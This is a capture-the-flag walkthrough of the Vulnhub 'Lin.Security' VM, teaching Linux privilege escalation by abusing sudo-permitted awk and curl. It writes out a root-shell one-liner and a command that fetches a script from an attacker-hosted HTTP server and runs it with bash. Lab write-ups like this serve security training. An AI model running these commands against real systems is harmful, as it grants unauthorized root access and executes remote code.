Lin.Security – Vulnhub CTF Challenge Walkthrough

  • 162
  •  
  •  
  •  
  •  
  •  
  •  
  •  
    162
    Shares

Lin Security is available at Vulnhub. This VM is made for “Beginners” to master Privilege Escalation in Linux Environment using diverse range of techniques. There is no vulnerability in Kernel and you have to exploit Software misconfiguration vulnerabilities. SSH credentials for this machine are “bob: secret”, so there is no need to run Nmap scans.

Import this VM to Virtualbox and turn on.

Use netdiscover to determine the IP and register this IP to “/etc/hosts”.

 

Login to this machine through SSH using credentials “bob: secret”.

 

Type “sudo -l” to see the commands that user “bob” may run as root.

 

This is the list of commands that user “bob” may run as root. First, we’ll try to include the shell directly.

 

You can use “awk” to get root.

sudo awk 'BEGIN {system("/bin/bash")}'

 

Now, we’ll abuse curl to gain root privileges. We host a script on our Python Server.

echo #!/bin/bash > script.sh
echo "sudo /bin/bash" > script.sh
python -m SimpleHTTPServer 1234

 

Download the script using curl and execute it.

bash <(curl -s http://192.168.0.105:1234/script.sh)

 

There are a lot of ways to abuse these commands at https://gtfobins.github.io/, you can try them by yourself.

Want to learn more about ethical hacking?

We have a  networking hacking course that is of a similar level to OSCP, get an exclusive 95% discount HERE

The following two tabs change content below.

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]

Leave a Reply